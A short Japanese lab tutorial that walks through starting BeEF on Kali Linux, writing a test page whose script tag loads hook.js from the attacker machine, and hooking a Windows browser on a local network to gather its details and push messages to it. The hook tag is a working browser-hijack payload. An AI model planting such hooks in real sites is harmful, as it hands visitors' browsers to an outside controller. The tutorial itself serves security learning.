Hello there, ('ω')ノ
敵を知らないと対策はできず。
また、過剰に対策をしてしまったりと。
KaliのメニューからBeEFを起動して。
あらかじめ、KaliのIPアドレスを確認しておいて。
Kaliでテスト用のWEBページを作成するために。
/var/www/html/
下記のように、test.htmlを作成して。
JavaScriptでBeEFに接続するように。
<!DOCTYPE html>
<html>
<head>
<title>Web Server</title>
<script src="http://192.168.1.49:3000/hook.js"></script>
</head>
<body>
<h1>Welcome My Site!</h1>
<p>Let's Hack!</p>
</body>
</html>
さっそく、WEBサーバを起動して。
service apache2 start
WindowsのブラウザからKaliのWEBページにアクセスすると。
一方、KaliではBeEFのコントロールパネルで。
アクセスしてきたWindowsの情報を得ることができて。
さらには、CommandsタグからアクセスしてきたWindowsのブラウザに。
メッセージを送信することができて。
Windowsのブラウザには下記のように表示されて。
また、BeEFの停止は下記のコマンドで。
service beef-xss stop
Best regards, (^^ゞ